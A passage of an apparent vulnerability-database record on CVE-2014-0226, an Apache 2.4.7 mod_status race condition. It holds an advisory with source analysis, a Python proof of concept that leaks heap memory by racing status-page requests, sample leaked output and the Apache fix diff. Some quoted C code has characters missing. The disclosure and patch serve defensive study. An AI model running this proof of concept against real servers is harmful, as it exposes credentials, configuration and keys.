n)\r\n 113{\r\n 114 void *res;\r\n 115\r\n 116 if (m == NULL)\r\n 117 return NULL;\r\n 118 res = apr_palloc(a, n);\r\n 119 memcpy(res, m, n);\r\n 120 return res;\r\n\r\n It allocates memory using apr_palloc function which returns\r\n\"ditry\" memory (note that apr_pcalloc overwrite\r\n allocated memory with NULs).\r\n\r\n So it's non-deterministic what's after the copied \"G\" byte.\r\nThere might be or might be not. For now let's\r\n assume that the memory allocated by apr_palloc was dirty\r\n(containing random bytes).\r\n 7) ap_escape_logitem returns \"G.....\" .junk. \"\"\r\n\r\nThe value from the example above is then pushed to the ap_escape_html2\r\nfunction which is also declared in util.c:\r\n\r\n 1860AP_DECLARE(char *) ap_escape_html2(apr_pool_t *p, const char\r\n*s, int toasc)\r\n 1861{\r\n 1862 int i, j;\r\n 1863 char *x;\r\n 1864\r\n 1865 /* first, count the number of extra characters */\r\n 1866 for (i = 0, j = 0; s[i] != ''; i++)\r\n 1867 if (s[i] == '')\r\n 1868 j += 3;\r\n 1869 else if (s[i] == '&')\r\n 1870 j += 4;\r\n 1871 else if (s[i] == '\"')\r\n 1872 j += 5;\r\n 1873 else if (toasc && !apr_isascii(s[i]))\r\n 1874 j += 5;\r\n 1875\r\n 1876 if (j == 0)\r\n 1877 return apr_pstrmemdup(p, s, i);\r\n 1878\r\n 1879 x = apr_palloc(p, i + j + 1);\r\n 1880 for (i = 0, j = 0; s[i] != ''; i++, j++)\r\n 1881 if (s[i] == '') {\r\n 1886 memcpy(&x[j], \">\", 4);\r\n 1887 j += 3;\r\n 1888 }\r\n 1889 else if (s[i] == '&') {\r\n 1890 memcpy(&x[j], \"&\", 5);\r\n 1891 j += 4;\r\n 1892 }\r\n 1893 else if (s[i] == '\"') {\r\n 1894 memcpy(&x[j], \"\"\", 6);\r\n 1895 j += 5;\r\n 1896 }\r\n 1897 else if (toasc && !apr_isascii(s[i])) {\r\n 1898 char *esc = apr_psprintf(p, \"&#%3.3d;\", (unsigned\r\nchar)s[i]);\r\n 1899 memcpy(&x[j], esc, 6);\r\n 1900 j += 5;\r\n 1901 }\r\n 1902 else\r\n 1903 x[j] = s[i];\r\n 1904\r\n 1905 x[j] = '';\r\n 1906 return x;\r\n 1907}\r\n\r\nIf the string from the example above would be passed to this function\r\nwe should get the following code-flow:\r\n\r\n 1) in the for-loop started in line 1866 we count the length of\r\nescaped string\r\n 2) because 's' string contains junk (due to only one byte being\r\nallocated by the apr_palloc function),\r\n it may contain '>' character. Let's assume that this is our\r\ncase\r\n 3) after for-loop in 1866 line 'j' is greater than 0 (at least one\r\ns[i] equals '>' as assumed above\r\n 4) in the 1879 line memory for escaped 'd' string is allocated\r\n 5) for-loop started in line 1880 copies string 's' to the escaped\r\n'd' string BUT apr_palloc has allocated\r\n only one byte for 's'. Thus, for each i > 0 the loop reads\r\nrandom memory and copies that value\r\n to 'd' string. At this point it's possible to trigger an\r\ninformation leak vulnerability (see section 5).\r\n\r\nHowever the 's' string may overlap with 'd' i.e.:\r\n\r\n 's' is allocated under 0 with contents s = \"AAAAAAAA>\"\r\n 'd' is allocated under 8 then s[8] = d[0].\r\n\r\nIf that would be the case, then for-loop would run forever (s[i] never\r\nwould be since it was overwritten in the loop\r\nby non-zero). Forever... until it hits an unmapped memory or read only\r\narea.\r\n\r\nPart of the scoreboard.c code which may overwrite the\r\nws_record->request was discovered using a tsan:\r\n\r\n #1 ap_escape_logitem ??:0 (exe+0x0000000411f2)\r\n #2 status_handler\r\n/home/akat-1/src/httpd-2.4.7/modules/generators/mod_status.c:839\r\n(mod_status.so+0x0000000044b0)\r\n #3 ap_run_handler ??:0 (exe+0x000000084d98)\r\n #4 ap_invoke_handler ??:0 (exe+0x00000008606e)\r\n #5 ap_process_async_request ??:0 (exe+0x0000000b7ed9)\r\n #6 ap_process_http_async_connection http_core.c:0\r\n(exe+0x0000000b143e)\r\n #7 ap_process_http_connection http_core.c:0 (exe+0x0000000b177f)\r\n #8 ap_run_process_connection ??:0 (exe+0x00000009d156)\r\n #9 process_socket event.c:0 (exe+0x0000000cc65e)\r\n #10 worker_thread event.c:0 (exe+0x0000000d0945)\r\n #11 dummy_worker thread.c:0 (libapr-1.so.0+0x00000004bb57)\r\n #12 :0 (libtsan.so.0+0x00000001b279)\r\n\r\n Previous write of size 1 at 0x7feff2b862b8 by thread T2:\r\n #0 update_child_status_internal scoreboard.c:0\r\n(exe+0x00000004d4c6)\r\n #1 ap_update_child_status_from_conn ??:0 (exe+0x00000004d693)\r\n #2 ap_process_http_async_connection http_core.c:0\r\n(exe+0x0000000b139a)\r\n #3 ap_process_http_connection http_core.c:0 (exe+0x0000000b177f)\r\n #4 ap_run_process_connection ??:0 (exe+0x00000009d156)\r\n #5 process_socket event.c:0 (exe+0x0000000cc65e)\r\n #6 worker_thread event.c:0 (exe+0x0000000d0945)\r\n #7 dummy_worker thread.c:0 (libapr-1.so.0+0x00000004bb57)\r\n #8 :0 (libtsan.so.0+0x00000001b279)\r\n--[ 3. Consequences\r\n\r\nRace condition described in section 2, may lead to:\r\n\r\n - information leak in case when the string returned by\r\nap_escape_logitem is not at the end,\r\n junk after copied bytes may be valuable\r\n - overwriting heap with a user supplied value which may imply code\r\nexecution\r\n--[ 4. Exploitation\r\n\r\n In order to exploit the heap overflow bug it's necessary to get\r\ncontrol over:\r\n\r\n 1) triggering the race-condition bug\r\n 2) allocating 's' and 'd' strings in the ap_escape_html2 to overlap\r\n 3) part of 's' which doesn't overlap with 'd' (this string is copied\r\nover and over again)\r\n 4) overwriting the heap in order to get total control over the cpu or\r\nat least modify the\r\n apache's handler code flow for our benefits\r\n--[ 5. Information Disclosure Proof of Concept\r\n\r\n -- cut\r\n #! /usr/bin/env python\r\n\r\n import httplib\r\n import sys\r\n import threading\r\n import subprocess\r\n import random\r\n\r\n def send_request(method, url):\r\n try:\r\n c = httplib.HTTPConnection('127.0.0.1', 80)\r\n c.request(method,url);\r\n if \"foo\" in url:\r\n print c.getresponse().read()\r\n c.close()\r\n except Exception, e:\r\n print e\r\n pass\r\n\r\n def mod_status_thread():\r\n while True:\r\n send_request(\"GET\", \"/foo?notables\")\r\n\r\n def requests():\r\n evil = ''.join('A' for i in range(random.randint(0, 1024)))\r\n while True:\r\n send_request(evil, evil)\r\n\r\n threading.Thread(target=mod_status_thread).start()\r\n threading.Thread(target=requests).start()\r\n\r\n -- cut\r\n\r\nBelow are the information leak samples gathered by running the poc\r\nagainst the\r\ntesting Apache instance. Leaks include i.e. HTTP headers, htaccess\r\ncontent,\r\nhttpd.conf content etc. On a live systems with a higher traffic\r\nsamples should\r\nbe way more interesting.\r\n\r\n $ ./poc.py | grep \"\" |grep -v AAAA | grep -v \"{}\"| grep -v notables\r\n 127.0.0.1 {A} []\r\n 127.0.0.1 {A.01 cu0 cs0\r\n 127.0.0.1 {A27.0.0.1} []\r\n 127.0.0.1 {A|0|10 [Dead] u.01 s.01 cu0 cs0\r\n 127.0.0.1 {A\r\n \u00db []\r\n 127.0.0.1 {A HTTP/1.1} []\r\n 127.0.0.1 {Ab><br />\r\n 127.0.0.1 {AAA}</i> <b>[127.0.1.1:19666]</b><br\r\n/>\r\n 127.0.0.1 {A0.1.1:19666]</b><br />\r\n 127.0.0.1 {A\u00a7} []\r\n 127.0.0.1 {A cs0\r\n 127.0.0.1 {Adentity\r\n 127.0.0.1 {A HTTP/1.1} []\r\n 127.0.0.1 {Ape: text/html; charset=ISO-8859-1\r\n 127.0.0.1 {Ahome/IjonTichy/httpd-2.4.7-vanilla/htdocs/} []\r\n 127.0.0.1 {A\u00ff\u00ff\u00ff\u00ff\u00ff\u00ff\u00ff} []\r\n 127.0.0.1 {Aanilla/htdocs/foo} []\r\n 127.0.0.1 {A0n/httpd-2.4.7-vanilla/htdocs/foo/} []\r\n 127.0.0.1 {A......................................... } []\r\n 127.0.0.1 {A-2014 16:23:30 CEST} []\r\n 127.0.0.1 {Acontent of htaccess\r\n 127.0.0.1 {Aver: Apache/2.4.7 (Unix)\r\n 127.0.0.1 {Aroxy:balancer://mycluster} []\r\nWe hope you enjoyed it.\r\n\r\nRegards,\r\nMarek Kroemeke, AKAT-1 and 22733db72ab3ed94b5f8a1ffcde850251fe6f466\r\n\r\n\r\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/34133/"}], "zdt": [{"lastseen": "2018-02-06T23:12:29", "bulletinFamily": "exploit", "description": "Exploit for linux platform in category dos / poc", "modified": "2014-07-20T00:00:00", "published": "2014-07-20T00:00:00", "id": "1337DAY-ID-22451", "href": "https://0day.today/exploit/description/22451", "type": "zdt", "title": "Apache 2.4.7 httpd mod_status Heap Buffer Overflow Vulnerability", "sourceData": "URL: http://svn.apache.org/r1610499\r\nLog:\r\nMerge 1610491 from trunk:\r\n\r\nSECURITY (CVE-2014-0226): Fix a race condition in scoreboard handling,\r\nwhich could lead to a heap buffer overflow. Thanks to Marek Kroemeke\r\nworking with HP's Zero Day Initiative for reporting this.\r\n\r\n* include/scoreboard.h: Add ap_copy_scoreboard_worker.\r\n\r\n* server/scoreboard.c (ap_copy_scoreboard_worker): New function.\r\n\r\n* modules/generators/mod_status.c (status_handler): Use it.\r\n\r\n* modules/lua/lua_request.c (lua_ap_scoreboard_worker): Likewise.\r\n\r\nReviewed by: trawick, jorton, covener, jim\r\nSubmitted by: jorton, covener\r\n\r\nModified:\r\nhttpd/httpd/branches/2.4.x/ (props changed)\r\nhttpd/httpd/branches/2.4.x/CHANGES\r\nhttpd/httpd/branches/2.4.x/include/ap_mmn.h\r\nhttpd/httpd/branches/2.4.x/include/scoreboard.h\r\nhttpd/httpd/branches/2.4.x/modules/generators/mod_status.c\r\nhttpd/httpd/branches/2.4.x/modules/lua/lua_request.c\r\nhttpd/httpd/branches/2.4.x/server/scoreboard.c\r\n\r\nPropchange: httpd/httpd/branches/2.4.x/\r\n------------------------------------------------------------------------------\r\nMerged /httpd/httpd/trunk:r1610491\r\n\r\nModified: httpd/httpd/branches/2.4.x/CHANGES\r\nURL:\r\nhttp://svn.apache.org/viewvc/httpd/httpd/branches/2.4.x/CHANGES?rev=1610499&r1=1610498&r2=1610499&view=diff\r\n==============================================================================\r\n--- httpd/httpd/branches/2.4.x/CHANGES [utf-8] (original)\r\n+++ httpd/httpd/branches/2.4.x/CHANGES [utf-8] Mon Jul 14 19:55:04 2014\r\n@@ -2,6 +2,10 @@\r\n\r\nChanges with Apache 2.4.10\r\n\r\n+ *) SECURITY: CVE-2014-0226 (cve.mitre.org)\r\n+ Fix a race condition in scoreboard handling, which could lead to\r\n+ a heap buffer overflow. [Joe Orton]\r\n+\r\n*) mod_ssl: Extend the scope of SSLSessionCacheTimeout to sessions\r\nresumed by TLS session resumption (RFC 5077). [Rainer Jung]\r\n\r\n\r\nModified: httpd/httpd/branches/2.4.x/include/ap_mmn.h\r\nURL:\r\nhttp://svn.apache.org/viewvc/httpd/httpd/branches/2.4.x/include/ap_mmn.h?rev=1610499&r1=1610498&r2=1610499&v\r\niew=diff\r\n==============================================================================\r\n--- httpd/httpd/branches/2.4.x/include/ap_mmn.h (original)\r\n+++ httpd/httpd/branches/2.4.x/include/ap_mmn.h Mon Jul 14 19:55:04 2014\r\n@@ -431,6 +431,7 @@\r\n* 20120211.34 (2.4.10-dev) AP_DEFAULT_HANDLER_NAME/AP_IS_DEFAULT_HANDLER_NAME\r\n* 20120211.35 (2.4.10-dev) Add \"r\", \"must_rebind\", and last_backend_conn\r\nto util_ldap_connection_t\r\n+ * 20120211.36 (2.4.10-dev) Add ap_copy_scoreboard_worker()\r\n*/\r\n\r\n#define MODULE_MAGIC_COOKIE 0x41503234UL /* \"AP24\" */\r\n@@ -438,7 +439,7 @@\r\n#ifndef MODULE_MAGIC_NUMBER_MAJOR\r\n#define MODULE_MAGIC_NUMBER_MAJOR 20120211\r\n#endif\r\n-#define MODULE_MAGIC_NUMBER_MINOR 35 /* 0...n */\r\n+#define MODULE_MAGIC_NUMBER_MINOR 36 /* 0...n */\r\n\r\n/**\r\n* Determine if the server's current MODULE_MAGIC_NUMBER is at least a\r\n\r\nModified: httpd/httpd/branches/2.4.x/include/scoreboard.h\r\nURL:\r\nhttp://svn.apache.org/viewvc/httpd/httpd/branches/2.4.x/include/scoreboard.h?rev=1610499&r1=1610498&r2=1610499&a\r\nmp;view=diff\r\n==============================================================================\r\n--- httpd/httpd/branches/2.4.x/include/scoreboard.h (original)\r\n+++ httpd/httpd/branches/2.4.x/include/scoreboard.h Mon Jul 14 19:55:04 2014\r\n@@ -183,8 +183,25 @@ AP_DECLARE(int) ap_update_child_status_f\r\nAP_DECLARE(void) ap_time_process_request(ap_sb_handle_t *sbh, int status);\r\n\r\nAP_DECLARE(worker_score *) ap_get_scoreboard_worker(ap_sb_handle_t *sbh);\r\n+\r\n+/** Return a pointer to the worker_score for a given child, thread pair.\r\n+ * @param child_num The child number.\r\n+ * @param thread_num The thread number.\r\n+ * @return A pointer to the worker_score structure.\r\n+ * @deprecated This function is deprecated, use ap_copy_scoreboard_worker instead. */\r\nAP_DECLARE(worker_score *) ap_get_scoreboard_worker_from_indexes(int child_num,\r\nint thread_num);\r\n+\r\n+/** Copy the contents of a worker scoreboard entry. The contents of\r\n+ * the worker_score structure are copied verbatim into the dest\r\n+ * structure.\r\n+ * @param dest Output parameter.\r\n+ * @param child_num The child number.\r\n+ * @param thread_num The thread number.\r\n+ */\r\n+AP_DECLARE(void) ap_copy_scoreboard_worker(worker_score *dest,\r\n+ int child_num, int thread_num);\r\n+\r\nAP_DECLARE(process_score *) ap_get_scoreboard_process(int x);\r\nAP_DECLARE(global_score *) ap_get_scoreboard_global(void);\r\n\r\n\r\nModified: httpd/httpd/branches/2.4.x/modules/generators/mod_status.c\r\nURL:\r\nhttp://svn.apache.org/viewvc/httpd/httpd/branches/2.4.x/modules/generators/mod_status.c?rev=1610499&r1=1610498&r\r\n2=1610499&view=diff\r\n==============================================================================\r\n--- httpd/httpd/branches/2.4.x/modules/generators/mod_status.c (original)\r\n+++ httpd/httpd/branches/2.4.x/modules/generators/mod_status.c Mon Jul 14 19:55:04 2014\r\n@@ -194,7 +194,7 @@ static int status_handler(request_rec *r\r\nlong req_time;\r\nint short_report;\r\nint no_table_report;\r\n- worker_score *ws_record;\r\n+ worker_score *ws_record = apr_palloc(r->pool, sizeof *ws_record);\r\nprocess_score *ps_record;\r\nchar *stat_buffer;\r\npid_t *pid_buffer, worker_pid;\r\n@@ -306,7 +306,7 @@ static int status_handler(request_rec *r\r\nfor (j = 0; j < thread_limit; ++j) {\r\nint indx = (i * thread_limit) + j;\r\n\r\n- ws_record = ap_get_scoreboard_worker_from_indexes(i, j);\r\n+ ap_copy_scoreboard_worker(ws_record, i, j);\r\nres = ws_record->status;\r\n\r\nif ((i >= max_servers || j >= threads_per_child)\r\n@@ -637,7 +637,7 @@ static int status_handler(request_rec *r\r\n\r\nfor (i = 0; i < server_limit; ++i) {\r\nfor (j = 0; j < thread_limit; ++j) {\r\n- ws_record = ap_get_scoreboard_worker_from_indexes(i, j);\r\n+ ap_copy_scoreboard_worker(ws_record, i, j);\r\n\r\nif (ws_record->access_count == 0 &&\r\n(ws_record->status == SERVER_READY ||\r\n\r\nModified: httpd/httpd/branches/2.4.x/modules/lua/lua_request.c\r\nURL:\r\nhttp://svn.apache.org/viewvc/httpd/httpd/branches/2.4.x/modules/lua/lua_request.c?rev=1610499&r1=1610498&r2=1610\r\n499&view=diff\r\n==============================================================================\r\n--- httpd/httpd/branches/2.4.x/modules/lua/lua_request.c (original)\r\n+++ httpd/httpd/branches/2.4.x/modules/lua/lua_request.c Mon Jul 14 19:55:04 2014\r\n@@ -1245,16 +1245,22 @@ static int lua_ap_scoreboard_process(lua\r\n*/\r\nstatic int lua_ap_scoreboard_worker(lua_State *L)\r\n{\r\n- int i,\r\n- j;\r\n- worker_score *ws_record;\r\n+ int i, j;\r\n+ worker_score *ws_record = NULL;\r\n+ request_rec *r = NULL;\r\n\r\nluaL_checktype(L, 1, LUA_TUSERDATA);\r\nluaL_checktype(L, 2, LUA_TNUMBER);\r\nluaL_checktype(L, 3, LUA_TNUMBER);\r\n+\r\n+ r = ap_lua_check_request_rec(L, 1);\r\n+ if (!r) return 0;\r\n+\r\ni = lua_tointeger(L, 2);\r\nj = lua_tointeger(L, 3);\r\n- ws_record = ap_get_scoreboard_worker_from_indexes(i, j);\r\n+ ws_record = apr_palloc(r->pool, sizeof *ws_record);\r\n+\r\n+ ap_copy_scoreboard_worker(ws_record, i, j);\r\nif (ws_record) {\r\nlua_newtable(L);\r\n\r\n\r\nModified: httpd/httpd/branches/2.4.x/server/scoreboard.c\r\nURL:\r\nhttp://svn.apache.org/viewvc/httpd/httpd/branches/2.4.x/server/scoreboard.c?rev=1610499&r1=1610498&r2=1610499&am\r\np;view=diff\r\n==============================================================================\r\n--- httpd/httpd/branches/2.4.x/server/scoreboard.c (original)\r\n+++ httpd/httpd/branches/2.4.x/server/scoreboard.c Mon Jul 14 19:55:04 2014\r\n@@ -579,6 +579,21 @@ AP_DECLARE(worker_score *) ap_get_scoreb\r\nsbh->thread_num);\r\n}\r\n\r\n+AP_DECLARE(void) ap_copy_scoreboard_worker(worker_score *dest,\r\n+ int child_num,\r\n+ int thread_num)\r\n+{\r\n+ worker_score *ws = ap_get_scoreboard_worker_from_indexes(child_num, thread_num);\r\n+\r\n+ memcpy(dest, ws, sizeof *ws);\r\n+\r\n+ /* For extra safety, NUL-terminate the strings returned, though it\r\n+ * should be true those last bytes are always zero anyway. */\r\n+ dest->client[sizeof(dest->client) - 1] = '\\0';\r\n+ dest->request[sizeof(dest->request) - 1] = '\\0';\r\n+ dest->vhost[sizeof(dest->vhost) - 1] = '\\0';\r\n+}\r\n+\r\nAP_DECLARE(process_score *) ap_get_scoreboard_process(int x)\r\n{\r\nif ((x < 0) || (x >= server_limit)) {\r\n\r\n\r\n-----------------------------------------------------------------------\r\nApache 2.4.7 mod_status Scoreboard Handling Race Condition\r\n-----------------------------------------------------------------------\r\n\r\n--[ 0. Sparse summary\r\nRace condition between updating httpd's \"scoreboard\" and mod_status,\r\nleading to several critical scenarios like heap buffer overflow with\r\nuser\r\nsupplied payload and leaking heap which can leak critical memory\r\ncontaining\r\nhtaccess credentials, ssl certificates private keys and so on.\r\n--[ 1. Prerequisites\r\n \r\nApache httpd compiled with MPM event or MPM worker.\r\nThe tested version was 2.4.7 compiled with:\r\n \r\n ./configure --enable-mods-shared=reallyall --with-included-apr\r\n \r\nThe tested mod_status configuration in httpd.conf was:\r\n SetHandler server-status\r\n ExtendedStatus On\r\n--[ 2. Race Condition\r\n \r\nFunction ap_escape_logitem in server/util.c looks as follows:\r\n \r\n 1908AP_DECLARE(char *) ap_escape_logitem(apr_pool_t *p, const char\r\n*str)\r\n 1909{\r\n 1910 char *ret;\r\n 1911 unsigned char *d;\r\n 1912 const unsigned char *s;\r\n 1913 apr_size_t length, escapes = 0;\r\n 1914\r\n 1915 if (!str) {\r\n 1916 return NULL;\r\n 1917 }\r\n 1918\r\n 1919 /* Compute how many characters need to be escaped */\r\n 1920 s = (const unsigned char *)str;\r\n 1921 for (; *s; ++s) {\r\n 1922 if (TEST_CHAR(*s, T_ESCAPE_LOGITEM)) {\r\n 1923 escapes++;\r\n 1924 }\r\n 1925 }\r\n 1926\r\n 1927 /* Compute the length of the input string, including NULL\r\n*/\r\n 1928 length = s - (const unsigned char *)str + 1;\r\n 1929\r\n 1930 /* Fast path: nothing to escape */\r\n 1931 if (escapes == 0) {\r\n 1932 return apr_pmemdup(p, str, length);\r\n 1933 }\r\n \r\nIn the for-loop between 1921 and 1925 lines function is computing the\r\nlength of\r\nsupplied str (almost like strlen, but additionally it counts special\r\ncharacters\r\nwhich need to be escaped). As comment in 1927 value says, function\r\ncomputes count\r\nof bytes to copy. If there's nothing to escape function uses\r\napr_pmemdup to duplicate\r\nthe str. In our single-threaded mind everything looks good, but tricky\r\npart starts\r\nwhen we introduce multi-threading. Apache in MPM mode runs workers as\r\nthreads, let's\r\nconsider the following scenario:\r\n \r\n 1) ap_escape_logitem(pool, \"\") is called\r\n 2) for-loop in 1921 line immediately escapes, because *s is in\r\nfirst loop run\r\n 3) malicious thread change memory under *s to another value\r\n(something which is not )\r\n 4) apr_pmemdup copies that change value to new string and returns\r\nit\r\n \r\nOutput from the ap_escape_logitem is considered to be a string, if\r\nscenario above would occur,\r\nthen returned string would not be zeroed at the end, which may be\r\nharmful. The mod_status\r\ncode looks as follows:\r\n \r\n 833 ap_rprintf(r, \"%s%s\"\r\n 834 \"%snn\",\r\n 835 ap_escape_html(r->pool,\r\n 836 \r\nws_record->client),\r\n 837 ap_escape_html(r->pool,\r\n 838 \r\nws_record->vhost),\r\n 839 ap_escape_html(r->pool,\r\n 840 \r\nap_escape_logitem(r->pool,\r\n 841 \r\nws_record->request)));\r\n \r\nThe relevant call to ap_escape_html() is at line 839 after the\r\nevaluation of ap_escape_logitem().\r\nThe first argument passed to the ap_escape_logitem() is in fact an apr\r\npool associated with\r\nthe HTTP request and defined in the request_rec structure.\r\n \r\nThis code is a part of a larger for-loop where code is iterating over\r\nworker_score structs which is\r\ndefined as follows:\r\n \r\n 90struct worker_score {\r\n 91#if APR_HAS_THREADS\r\n 92 apr_os_thread_t tid;\r\n 93#endif\r\n 94 int thread_num;\r\n 95 /* With some MPMs (e.g., worker), a worker_score can\r\nrepresent\r\n 96 * a thread in a terminating process which is no longer\r\n 97 * represented by the corresponding process_score. These\r\nMPMs\r\n 98 * should set pid and generation fields in the worker_score.\r\n 99 */\r\n 100 pid_t pid;\r\n 101 ap_generation_t generation;\r\n 102 unsigned char status;\r\n 103 unsigned short conn_count;\r\n 104 apr_off_t conn_bytes;\r\n 105 unsigned long access_count;\r\n 106 apr_off_t bytes_served;\r\n 107 unsigned long my_access_count;\r\n 108 apr_off_t my_bytes_served;\r\n 109 apr_time_t start_time;\r\n 110 apr_time_t stop_time;\r\n 111 apr_time_t last_used;\r\n 112#ifdef HAVE_TIMES\r\n 113 struct tms times;\r\n 114#endif\r\n 115 char client[40]; /* Keep 'em small... but large\r\nenough to hold an IPv6 address */\r\n 116 char request[64]; /* We just want an idea... */\r\n 117 char vhost[32]; /* What virtual host is being\r\naccessed? */\r\n 118};\r\n \r\nThe 'request' field in a worker_score structure is particularly\r\ninteresting - this field can be changed inside\r\nthe copy_request function, which is called by the\r\nupdate_child_status_internal. This change may occur when the\r\nmod_status is iterating over the workers at the same time the\r\nap_escape_logitem is called within a different\r\nthread, leading to a race condition. We can trigger this exact\r\nscenario in order to return a string without a\r\ntrailing . This can be achived by running two clients, one triggering\r\nthe mod_status handler and second\r\nsending random requests to the web server. Let's consider the\r\nfollowing example:\r\n \r\n 1) the mod_status iterates over workers invoking\r\nupdate_child_status_internal()\r\n 2) at some point for one worker mod_status calls\r\nap_escape_logitem(pool, ws_record->request)\r\n 3) let's asume that ws_record->request at the beginning is \"\"\r\nliterally at the first byte.\r\n 4) inside the ap_escape_logitem function the length of the\r\nws_record->request is computed, which is 1\r\n (an empty string consisting of )\r\n 5) another thread modifies ws_record->request (in fact it's called\r\nws->request in update_child_status_internal\r\n function but it's exactly the same location in memory) and puts\r\nthere i.e. \"GET / HTTP/1.0\"\r\n 6) the ap_pmemdup(pool, str, 1) in ap_escape_logitem copies the\r\nfirst one byte from \"GET / HTTP/1.0\" - \"G\" in\r\n that case and returns it. The ap_pmemdup looks as follows:\r\n \r\n 112APR_DECLARE(void *) apr_pmemdup(apr_pool_t *a, const void\r\n*m, apr_size_t n)\r\n 113{\r\n 114 void *res;\r\n 115\r\n 116 if (m == NULL)\r\n 117 return NULL;\r\n 118 res = apr_palloc(a, n);\r\n 119 memcpy(res, m, n);\r\n 120 return res;\r\n \r\n It allocates memory using apr_palloc function which returns\r\n\"ditry\" memory (note that apr_pcalloc overwrite\r\n allocated memory with NULs).\r\n \r\n So it's non-deterministic what's after the copied \"G\" byte.\r\nThere might be or might be not. For now let's\r\n assume that the memory allocated by apr_palloc was dirty\r\n(containing random bytes).\r\n 7) ap_escape_logitem returns \"G.....\" .junk. \"\"\r\n \r\nThe value from the example above is then pushed to the ap_escape_html2\r\nfunction which is also declared in util.c:\r\n \r\n 1860AP_DECLARE(char *) ap_escape_html2(apr_pool_t *p, const char\r\n*s, int toasc)\r\n 1861{\r\n 1862 int i, j;\r\n 1863 char *x;\r\n 1864\r\n 1865 /* first, count the number of extra characters */\r\n 1866 for (i = 0, j = 0; s[i] != ''; i++)\r\n 1867 if (s[i] == '')\r\n 1868 j += 3;\r\n 1869 else if (s[i] == '&')\r\n 1870 j += 4;\r\n 1871 else if (s[i] == '\"')\r\n 1872 j += 5;\r\n 1873 else if (toasc && !apr_isascii(s[i]))\r\n 1874 j += 5;\r\n 1875\r\n 1876 if (j == 0)\r\n 1877 return apr_pstrmemdup(p, s, i);\r\n 1878\r\n 1879 x = apr_palloc(p, i + j + 1);\r\n 1880 for (i = 0, j = 0; s[i] != ''; i++, j++)\r\n 1881 if (s[i] == '') {\r\n 1886 memcpy(&x[j], \">\", 4);\r\n 1887 j += 3;\r\n 1888 }\r\n 1889 else if (s[i] == '&') {\r\n 1890 memcpy(&x[j], \"&\", 5);\r\n 1891 j += 4;\r\n 1892 }\r\n 1893 else if (s[i] == '\"') {\r\n 1894 memcpy(&x[j], \"\"\", 6);\r\n 1895 j += 5;\r\n 1896 }\r\n 1897 else if (toasc && !apr_isascii(s[i])) {\r\n 1898 char *esc = apr_psprintf(p, \"&#%3.3d;\", (unsigned\r\nchar)s[i]);\r\n 1899 memcpy(&x[j], esc, 6);\r\n 1900 j += 5;\r\n 1901 }\r\n 1902 else\r\n 1903 x[j] = s[i];\r\n 1904\r\n 1905 x[j] = '';\r\n 1906 return x;\r\n 1907}\r\n \r\nIf the string from the example above would be passed to this function\r\nwe should get the following code-flow:\r\n \r\n 1) in the for-loop started in line 1866 we count the length of\r\nescaped string\r\n 2) because 's' string contains junk (due to only one byte being\r\nallocated by the apr_palloc function),\r\n it may contain '>' character. Let's assume that this is our\r\ncase\r\n 3) after for-loop in 1866 line 'j' is greater than 0 (at least one\r\ns[i] equals '>' as assumed above\r\n 4) in the 1879 line memory for escaped 'd' string is allocated\r\n 5) for-loop started in line 1880 copies string 's' to the escaped\r\n'd' string BUT apr_palloc has allocated\r\n only one byte for 's'. Thus, for each i > 0 the loop reads\r\nrandom memory and copies that value\r\n to 'd' string. At this point it's possible to trigger an\r\ninformation leak vulnerability (see section 5).\r\n \r\nHowever the 's' string may overlap with 'd' i.e.:\r\n \r\n 's' is allocated under 0 with contents s = \"AAAAAAAA>\"\r\n 'd' is allocated under 8 then s[8] = d[0].\r\n \r\nIf that would be the case, then for-loop would run forever (s[i] never\r\nwould be since it was overwritten in the loop\r\nby non-zero). Forever... until it hits an unmapped memory or read only\r\narea.\r\n \r\nPart of the scoreboard.c code which may overwrite the\r\nws_record->request was discovered using a tsan:\r\n \r\n #1 ap_escape_logitem ??:0 (exe+0x0000000411f2)\r\n #2 status_handler\r\n/home/akat-1/src/httpd-2.4.7/modules/generators/mod_status.c:839\r\n(mod_status.so+0x0000000044b0)\r\n #3 ap_run_handler ??:0 (exe+0x000000084d98)\r\n #4 ap_invoke_handler ??:0 (exe+0x00000008606e)\r\n #5 ap_process_async_request ??:0 (exe+0x0000000b7ed9)\r\n #6 ap_process_http_async_connection http_core.c:0\r\n(exe+0x0000000b143e)\r\n #7 ap_process_http_connection http_core.c:0 (exe+0x0000000b177f)\r\n #8 ap_run_process_connection ??:0 (exe+0x00000009d156)\r\n #9 process_socket event.c:0 (exe+0x0000000cc65e)\r\n #10 worker_thread event.c:0 (exe+0x0000000d0945)\r\n #11 dummy_worker thread.c:0 (libapr-1.so.0+0x00000004bb57)\r\n #12 :0 (libtsan.so.0+0x00000001b279)\r\n \r\n Previous write of size 1 at 0x7feff2b862b8 by thread T2:\r\n #0 update_child_status_internal scoreboard.c:0\r\n(exe+0x00000004d4c6)\r\n #1 ap_update_child_status_from_conn ??:0 (exe+0x00000004d693)\r\n #2 ap_process_http_async_connection http_core.c:0\r\n(exe+0x0000000b139a)\r\n #3 ap_process_http_connection http_core.c:0 (exe+0x0000000b177f)\r\n #4 ap_run_process_connection ??:0 (exe+0x00000009d156)\r\n #5 process_socket event.c:0 (exe+0x0000000cc65e)\r\n #6 worker_thread event.c:0 (exe+0x0000000d0945)\r\n #7 dummy_worker thread.c:0 (libapr-1.so.0+0x00000004bb57)\r\n #8 :0 (libtsan.so.0+0x00000001b279)\r\n--[ 3. Consequences\r\n \r\nRace condition described in section 2, may lead to:\r\n \r\n - information leak in case when the string returned by\r\nap_escape_logitem is not at the end,\r\n junk after copied bytes may be valuable\r\n - overwriting heap with a user supplied value which may imply code\r\nexecution\r\n--[ 4. Exploitation\r\n \r\n In order to exploit the heap overflow bug it's necessary to get\r\ncontrol over:\r\n \r\n 1) triggering the race-condition bug\r\n 2) allocating 's' and 'd' strings in the ap_escape_html2 to overlap\r\n 3) part of 's' which doesn't overlap with 'd' (this string is copied\r\nover and over again)\r\n 4) overwriting the heap in order to get total control over the cpu or\r\nat least modify the\r\n apache's handler code flow for our benefits\r\n--[ 5. Information Disclosure Proof of Concept\r\n \r\n -- cut\r\n #! /usr/bin/env python\r\n \r\n import httplib\r\n import sys\r\n import threading\r\n import subprocess\r\n import random\r\n \r\n def send_request(method, url):\r\n try:\r\n c = httplib.HTTPConnection('127.0.0.1', 80)\r\n c.request(method,url);\r\n if \"foo\" in url:\r\n print c.getresponse().read()\r\n c.close()\r\n except Exception, 